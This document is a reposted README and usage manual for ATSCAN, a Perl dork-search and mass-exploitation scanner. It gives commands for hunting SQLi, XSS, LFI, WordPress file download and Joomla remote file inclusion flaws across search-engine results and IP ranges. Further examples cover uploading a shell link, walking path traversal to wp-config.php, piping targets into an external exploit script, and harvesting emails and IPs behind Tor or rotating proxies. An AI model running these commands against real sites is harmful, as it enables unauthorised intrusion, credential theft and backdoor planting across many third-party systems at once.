ATSCAN SCANNER

Advanced Search / Dork / Mass Exploitation Scanner 

Description

Search engine Google / Bing / Ask / Yandex / Sogou
● Mass Dork Search
● Multiple instant scans.
● Mass Exploitation
● Use proxy.
● Random user agent.
● Random engine.
● Extern commands execution.
● XSS / SQLI / LFI / AFD scanner.
● Filter wordpress and Joomla sites on the server.
● Find Admin page.
● Decode / Encode Base64 / MD5
● Ports scan.
● Extract IPs
● Extract E-mails.
● Auto-detect errors.
● Auto-detect Cms.
● Post data.
● Auto sequence repeater.
● Validation.
● Post and Get method
● And more…

CHANGES: v16.0.1 17/02/2019

  • – Add target vulnerability for shodan scan.
  • – Add shodan honeyspot score.

Installation

git clone https://github.com/AlisamTechnology/ATSCAN 
cd ATSCAN 
chmod +x ./install.sh 
./install.sh
chmod +x ./atscan.pl

Usage

–help / -h / -?Help.
–proxySet tor proxy for scans [EX: –proxy “socks://localhost:9050”]
Set proxy [EX: –proxy “http://12.45.44.2:8080”]
Set proxy list [EX: –proxy list.txt]
-mSet engine motors default bing EX: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
–proxy-randomRandom proxy [EX: –proxy-random list.txt] or –proxy-random “socks://localhost:9050”]
–m-randomRandom of all disponibles engines
–b-randomRandom all disponibles agents
–freqRandom time frequency (in seconds)
–timeset browser time out
–dork / -dDork to search [Ex: house [OTHER]cars [OTHER]hotel]
-tTarget
–level / -lScan level (+- Number of page results to scan)
-pSet test parameter EX:id,cat,product_ID
–save / -sOutput.
–contentPrint request content
–dataPost and Get forms. See examples
–postUse post method
–getUse get method
–headerSet headers
–hostDomain name [Ex: site.com]
–nobannerHide tool banner
–beepProduce beep sound if positive scan found.
–ifendProduce beep sound when scan process is finished.
–noinfoJump extra results info.
–nopingNo host ping.
–limitLimit max positive scan results.
–valid / -vValidate by string
–statusValidate by http header status
–ifinurlGet targets with exact string matching
–sregexGet targets with exact regex matching
–noneGet negative validation or engine regex matching
–notinGet targets where string doesnot exist in html
–uniqueGet targets with exact dork matching
–replaceString to replace
–withString to replace with
–full–replace –full Will replace all url parametres from string to the end
–payloadUse your own payloads instead of tool ones
–exp|-eExploit/Payload will be added to full target
–expHostExploit will be added to the host
–expIpExploit will be added to the host ip
–sqlXss scan
–lfiLocal file inclusion
–joomrfiScan for joomla local file inclusion.
–shellShell link [Ex: http://www.site.com/shell.txt]
–wpafdScan wordpress sites for arbitrary file download
–adminGet site admin page
–shostGet site subdomains
–tcpTCP port
–udpUDP port
–sitesSites in the server
–wpWordPress sites in the server
–joomJoomla sites in the server
–uploadGet sites with upload files in the server
–zipGet sites with zip files in the server
–md5Convert to md5
–encode64Encode base64 string
–decode64decode base64 string
–TARGETWill be replaced by target in extern command
–HOSTWill be replaced by host in extern command
–HOSTIPWill be replaced by host IP in extern command
–PORTWill be replaced by open port in extern command
–ipCrawl to get Ips
–regexCrawl to get strings matching regex
–noqueryRemove string value from Query url [ex: site.com/index.php?id=string]
–command /-cExtern Command to execute
–emailGet emails
rang(x-y)EX: –expHost “/index.php?id=rang(1-9)” –sql OR -t “site.com/index.php?id=rang(1-9)” –sql
site.com/index.php?id=1 -> 9.
repeat(txt-y)EX: –expHost “/index.php?id=repeat(../-9)wp-config.php” –sql OR -t “site.com/index.php?id=../wp-config.php”
In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
[OTHER]To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
[DATA/DATAFILE]To separate data values ex: –data “name:username [DATA]email:xxxxxx [DATA]pass:xxxxx/[DATAFILE]pass:file.txt”
–updateUpdate tool
–toolTool info.
–configUser configuration.
–passSet a password for tool use.
–uninstallUninstall Tool.

● PROXY: 
Tor: –proxy [proxy] [Ex: –proxy socks://localhost:9050].
Proxy: Proxy: –proxy [proxy] Ex: http://12.32.1.5:8080
or –proxy list.txt Ex: –proxy my_proxies.txt

● RANDOM: 
Random proxy: –proxy-random [proxy list.txt]
Random browser: –b-random
Random engine: –m-random

● SET HEADERS:
atscan –dork [dork / dorks.txt] –level [level] –header “Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1”
atscan -t target –data “name:userfile[DATAFILE]value:file.txt –post –header “Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1”

● SEARCH ENGINE: 
Search: atscan –dork [dork] –level [level]
Search: atscan -d [dork] -l [level]
Set engine: atscan –dork [dork] –level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
Set selective engines: atscan -d [dork] -l [level] -m 1,2,3..
Search with many dorks: atscan –dork dork1 [OTHER]dork2 [OTHER]dork3] –level [level]
Search and rand: atscan -d [dork] -l [level] –expHost “/index.php?id=rang(1-9)” –sql
Get Server sites: atscan -t [ip] –level [value] –sites
Get Server sites: atscan -t “[ip from]-[ip to]” –level [value] –sites
Get Server sites: atscan -t “ip1 [OTHER]ip2” –level [value] –sites
Get Server wordpress sites: atscan -t [ip] –level [value] –wp
Get Server joomla sites: atscan -t [ip] –level value] –joom
Get Server upload sites: atscan -t [ip] –level [value] –upload
Get Server zip sites files: atscan -t [ip] –level value] –zip
WP Arbitry File Download: atscan -t [ip] –level [[[value] –wpafd
Joomla RFI: atscan -t [ip] –level [10] –joomfri –shell [shell link]
Search + output: atscan –dork [dorks.txt] –level [level] –save
Search + get emails: atscan -d [dorks.txt] -l [level] –email
Search + get site emails: atscan –dork site:site.com –level [level] –email
Search + get ips: atscan –dork [dork] –level [level] –ip

● REGULAR EXPRESSIONS: 
Regex use: atscan [–dork [dork> / -t [target]] –level [level] –regex [regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: ‘((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})’

● REPEATER:
atscan -t site.com?index.php?id=rang(1-10) –sql
atscan -t [target] –expHost “/index.php?id=rang(1-10)” –sql
atscan -t [target] –expHost “/index.php?id=repeat(../-9)wp-config.php”

● PORTS
atscan -t [ip] –port [port] [–udp / –tcp]
atscan -t (ip start)-(ip end) –port [port] [–udp / –tcp]
atscan -t [ip] –port (port start)-(port end) [–udp / –tcp] –command “your extern command”

● ENCODE / DECODE:
Generate MD5: –md5 [string]
Encode base64: –encode64 [string]
Decode base64: –decode64 [string]

● DATA:
Post data: atscan -t [target] –data “field1:value1 [DATA]field2:value2 [DATA]field3:value3” [–post / –get]
Wordlist: atscan -t [target] –data “name:userfile [DATAFILE]value:file.txt” [–post / –get]
atscan -t [target] –data “username:john [DATA]pass:1234” [–post / –get]
Post + Validation: –data “name:userfile [DATAFILE]value:file.txt” -v [string] / –status [code] [–post / –get]

● EXTERNAL COMMANDES:
atscan –dork [dork / dorks.txt] –level [level] –command “curl -v –TARGET”
atscan –dork [dork / dorks.txt] –level [level] –command “curl -v –HOST”
atscan –dork [dork / dorks.txt] –level [level] –command “nmap -sV -p 21,22,80 –HOSTIP”
atscan -d “index of /lib/scripts/dl-skin.php” -l 20 -m 2 –command “php WP-dl-skin.php-exploit.php –TARGET”

● MULTIPLE SCANS: 
atscan –dork [dork> –level [10] –sql –lfi –wp ..
atscan –dork [dork> –level [10] –replace [string] –with [string] –exp/expHost [payload] [–sql / –lfi / –wp /…]
atscan -t [ip] –level [10] [–sql / –lfi / –wp /…]
atscan -t [target] [–sql / –lfi / –wp /…]

● USER PAYLOADS: 
atscan –dork [dork] –level [10] [–lfi | –sql ..] –payload [payload | payloads.txt]

● SEARCH VALIDATION: 
atscan -d [dork / dorks.txt] -l [level] –status [code] / –valid [string]
atscan -d [dork / dorks.txt] -l [level] –status [code] –none (Positive when status does\’nt match)
atscan -d [dork / dorks.txt] -l [level] –status [code] / -v [string] / –ifinurl [string] / –sregex [regex] –none
atscan -d [dork / dorks.txt] -l [level] –ifinurl [string]
atscan -d [dork / dorks.txt] -l [level] –sregex [regex] –valid [string]
atscan -d [dork / dorks.txt] -l [level] –regex [regex] –valid [string]
atscan -d [dork / dorks.txt] -l [level] –unique

● SCAN VALIDATION: 
atscan -t [target / targets.txt] [–status [code] / –valid [string]
atscan -d [dork / dorks.txt] -l [level] –exp/expHost [payload] –status [code] / –valid [string]
atscan -d [dorks.txt] -l [level] –replace [string] –with [string] –status [code] / –valid [string]
atscan -d [dork / dorks.txt] -l [level] [–admin / –sql ..] –status [code] / –valid [string]
atscan -d [dorks.txt] -l [level] –replace [string] –with [string] –status [code] / –valid [string]
atscan -d [dorks.txt] -l [level] –replace [string] –with [string] –full –status [code] / –valid [string]
atscan -d [dorks.txt] -l [level] –replace [string] –with [string] –exp/expHost [payload] –status [code] / –valid [string]
atscan –data “name:userfile[DATAFILE]value:file.txt” -v [string] / –status [code] [–post / –get]
atscan -d [dork / dorks.txt] -l [level] [–sql / –shost ..] –status [code] / –valid [string]
atscan -t [target / targets.txt] –valid [string] –not in [string]

● UPDATE TOOL:
atscan –update

● UNINSTALL TOOL: 
atscan –uninstall

Copyright (c) 2015 Alisam Technology

Source: https://github.com/AlisamTechnology/

Loading